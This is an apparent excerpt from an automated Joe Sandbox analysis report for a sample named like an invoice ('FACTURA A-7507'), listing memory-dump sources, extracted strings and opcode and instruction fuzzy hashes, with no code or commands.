                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3446177414-0
                                                                                                                                                                                                                          • Opcode ID: 8759a20c43db0a4322cf421e5915a73629735939a57c835749fd3c0a86a1dbd3
                                                                                                                                                                                                                          • Instruction ID: 3e4012808ad6baa2e40a40815ca356387e9279e831d7ef5912c1989c0d01631b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8759a20c43db0a4322cf421e5915a73629735939a57c835749fd3c0a86a1dbd3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5DF0F0322046406FD335CB09CC04F8ABBFDEF84B00F04055DA54293191D7A0F945CA60
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 191679f550c654c8f8d3e67ee3dca2076c87b69baf0b779470958df27e13e0d9
                                                                                                                                                                                                                          • Instruction ID: c7d7ca48673999c83683d89172315eb0f01df70dfcb5fc1e4701b35a2dee167a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 191679f550c654c8f8d3e67ee3dca2076c87b69baf0b779470958df27e13e0d9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 39E06572714214ABEF04DB59E845F4A73FDEB88798F15009DF50AD7240E6A0EE41D750
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                          • API String ID: 0-2766056989
                                                                                                                                                                                                                          • Opcode ID: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                                                                                                                                                                                                          • Instruction ID: 20c0bf41c79cce59b7f67759c98893bbca86a634c33a6b96c73b90adea606f21
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C2614CB5D06219EFDB19CF99C841BDEBBB5FF48750F104169E810B72A0D7748A11CB90
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                          • API String ID: 0-2766056989
                                                                                                                                                                                                                          • Opcode ID: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
                                                                                                                                                                                                                          • Instruction ID: da580d47fa434c8b70cb9b63e20f094e42931c97d5c541b387e674c91913e4bd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EC519EB2608745BFEB19CE64C880F9A77E8FB44750F40092DF99597290D7B0DA058BA1
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: verifier.dll
                                                                                                                                                                                                                          • API String ID: 0-3265496382
                                                                                                                                                                                                                          • Opcode ID: 1878613d2c16c2d2e9faab1e79b3321ca696690dc54312e8c2416a67ca3504ad
                                                                                                                                                                                                                          • Instruction ID: 65a5c3a9fc5f74f6a178b3b8237f4bde48881e2b1278f0833f4d22b43a854b68
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1878613d2c16c2d2e9faab1e79b3321ca696690dc54312e8c2416a67ca3504ad
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0631E3B67542029FEB188F68D850B6673F5FB88750F9080AAE549DF381EBB1DD818760
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: #
                                                                                                                                                                                                                          • API String ID: 0-1885708031
                                                                                                                                                                                                                          • Opcode ID: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
                                                                                                                                                                                                                          • Instruction ID: e1384f9f79f5ca0c1609f0629dd2d9c2b42813d12cbafd3408b02c3071dc2d52
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D341D275A00615EBDF19CF88C980FBEBBB5FF40749F00409AE841AB300EB349942D791
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 3542FFF8
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode
                                                                                                                                                                                                                          • API String ID: 0-996340685
                                                                                                                                                                                                                          • Opcode ID: ce60f7f9e4cf36e345e519176b686bf0cd0a476faab5275be718a9435496c832
                                                                                                                                                                                                                          • Instruction ID: da20d780dcff63fda2c2ede9deb89cf79b72de1857b1cb8c368266ecf150a9c2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce60f7f9e4cf36e345e519176b686bf0cd0a476faab5275be718a9435496c832
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D41CF75A04749AED728DFB4C041AEBB7F8FF09300F10096ED5AAC3250E334A555CBA6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: Flst
                                                                                                                                                                                                                          • API String ID: 0-2374792617
                                                                                                                                                                                                                          • Opcode ID: 0bcbafd710c125679c85941b3006777acfd7628d709c15e46aedc427f67ac58a
                                                                                                                                                                                                                          • Instruction ID: f07695ff7a6d329cbf61f2770009279bc8eaa422253988bf13c1de5be1dd3de6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0bcbafd710c125679c85941b3006777acfd7628d709c15e46aedc427f67ac58a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 984186B16093029FD318CF18C180B16BBE5FF99B18F5085AEE4598B381EB71D946CB92
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: 3xw3xw
                                                                                                                                                                                                                          • API String ID: 3446177414-576627920
                                                                                                                                                                                                                          • Opcode ID: 8a48e2b5d7c915bfc1ad7b4524d1d0d68a239357804969694c77a91b63ac9100
                                                                                                                                                                                                                          • Instruction ID: 55167ed7a4ba590ddedaf0859499ee39448dfff293e4709c0e0dca714dcf31d8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a48e2b5d7c915bfc1ad7b4524d1d0d68a239357804969694c77a91b63ac9100
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0621AF76A40724AFD7298F58C840B1A7BF5FBC4B64F1204ADE5559B340DB71ED41CB90
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: dc8d2181627dc304f68921ee1b5589a9c9f54b2ad6e50773ca7dc20106e14582
                                                                                                                                                                                                                          • Instruction ID: a07978d9cd3dc64f7a268828eec477e6f21516c07b9f54ca182352f527ed16fe
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc8d2181627dc304f68921ee1b5589a9c9f54b2ad6e50773ca7dc20106e14582
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE42B575A046258FDB0DCF59C5A0AADB7B2FF88354F14859DD852AB340DB36E842CBA0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 7ce2b8f248a566ed9e08bd37ed8e5ed020049e8d03e51d4dff65dcdbd59354d4
                                                                                                                                                                                                                          • Instruction ID: 25640d8d4f6e760a817fa91abd0bbbed4ef7075005bb91255122b5ffdf900388
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ce2b8f248a566ed9e08bd37ed8e5ed020049e8d03e51d4dff65dcdbd59354d4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6E424CB9A002199FEB18CF69C881BADB7F5BF88350F5580DDE849AB241DB349985CF50
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 3015f1f68f78e4f8069f9bb0f993519ed926ad30d91adcc1ac75448307eb3fe8
                                                                                                                                                                                                                          • Instruction ID: 9fc0612939c890f222bc147b591d4958d1023cecaa356cd310669716eec0b582
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3015f1f68f78e4f8069f9bb0f993519ed926ad30d91adcc1ac75448307eb3fe8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D22A175B042568FDB0DCF99C490AAEB3F2BF88344F1491ADD856EB345DB31A942CB90
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 7d1aaacc891521c3788e90cc671c9dec6ba496eca610417396232e230b8ca701
                                                                                                                                                                                                                          • Instruction ID: 4547d3b0cec5eb0e2f9d0a2ef0db6f10516e1306b15fc25881ccaadee0270c6d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d1aaacc891521c3788e90cc671c9dec6ba496eca610417396232e230b8ca701
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C6C1E575A052059FEB1CCF58C842BDEBBB2BF49350F158299E825EB394E770E951CB80
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: c9c513d994af305f42dfd62e8d49853eb4e3348a752b1e973d35c8e05705344f
                                                                                                                                                                                                                          • Instruction ID: ee5a87f8e897881af98d8b6bf27cadab7a56ecb3d396b7708660267b30943673
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c9c513d994af305f42dfd62e8d49853eb4e3348a752b1e973d35c8e05705344f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7ED104B5A006449FEB59CF68C980B867BF9BF09340F0440BAED199B316EB71D905CBA0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 3d868c0b7ef3d168bb161449b229116fcb9620763cb767792156445e161bc8f1
                                                                                                                                                                                                                          • Instruction ID: b2f8c810eceea7155bb7a606a4cf2474415e0a4edcd91b1b784495791e7abef9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d868c0b7ef3d168bb161449b229116fcb9620763cb767792156445e161bc8f1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 88C1F1B5A457609BFB0CCF58C490BB9B3B1FB48B40F554199E8429B396EB70D942CBA0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 3df27d735eb94ad3aed72d0fedd6a76a0a55adeb03c4ee8ad24e64c1835c3795
                                                                                                                                                                                                                          • Instruction ID: f4f740d646a704e1ac633bc2ffa7670c9ec6c3f015f51851f4a3407f4cebb92b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3df27d735eb94ad3aed72d0fedd6a76a0a55adeb03c4ee8ad24e64c1835c3795
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EFC136B1A027059FDB19CFA8D841A9EBBF5FF48750F15806EE416AB361EB34A901CF50
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: c7c35de9a37a7072acc3c4c1be0a616c16e0d36e3f0098eb81a7862d70e1b1f0
                                                                                                                                                                                                                          • Instruction ID: fe60bdcec008ffa7414af5a3ab6daae8cfe669220d5f307452018b02e65e0619
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c7c35de9a37a7072acc3c4c1be0a616c16e0d36e3f0098eb81a7862d70e1b1f0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36918E71E0421AAFDF19CFA9D894BAEBBB5EF48710F104159E540EB340EBB5D9019BB0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: ae17e66443f7baa519c24b2dc3441132b9874fdc89d78cf6aae5b176c38f60aa
                                                                                                                                                                                                                          • Instruction ID: 2acac08eb50d50a35148513dd2d7ac4d3163b90767809dedfd050fec8c11bda5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae17e66443f7baa519c24b2dc3441132b9874fdc89d78cf6aae5b176c38f60aa
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7AB16DB9A0A306CFDB1CCF18D582B9977B1BB5C354F10459AE8219B3A1DB70D892DF90
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 4c29aa47f62e7395823bb0b9dbac7a55bdde0cfc349297c4bb1aac83eb5da543
                                                                                                                                                                                                                          • Instruction ID: a63f6bc4e5c452f0fae7c51f18b561302491e91f3542e1289a8932d6d9acbe56
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4c29aa47f62e7395823bb0b9dbac7a55bdde0cfc349297c4bb1aac83eb5da543
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 24A15875609342CFD308CF28C581A1ABBF6BF88744F14496EE5949B360EB70EA55CF92
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 4df71c31738c3cde0728cd101c237ae4b9a3368c0a631aa82a1bc992d5b7cfcc
                                                                                                                                                                                                                          • Instruction ID: 4591d8c25e3c4bf3e3283f1008b22100656a9df41217f2fa694d1efdbef122c6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4df71c31738c3cde0728cd101c237ae4b9a3368c0a631aa82a1bc992d5b7cfcc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2291F379944229ABDB19CF14CC40BE9B3B9BF49344F4081E9E988AB341E734DE95CF94
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 3bd6bb45f2ff03ac3460fc56b718573f81f2f6c7441370bccea4be0320480504
                                                                                                                                                                                                                          • Instruction ID: a9df771d9dc71d05a211ef9b14eead185f4ad5c2113f04db68d0115eb38957a8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3bd6bb45f2ff03ac3460fc56b718573f81f2f6c7441370bccea4be0320480504
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8471E075A0261A8BDB08CF95C881ABFB7FABF44792F95419AD811EB240EB34DD41C790
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: c629f1b1c5e99d3516065729987f42f7f6531b4cb63c6e1480efb82fe4590dfa
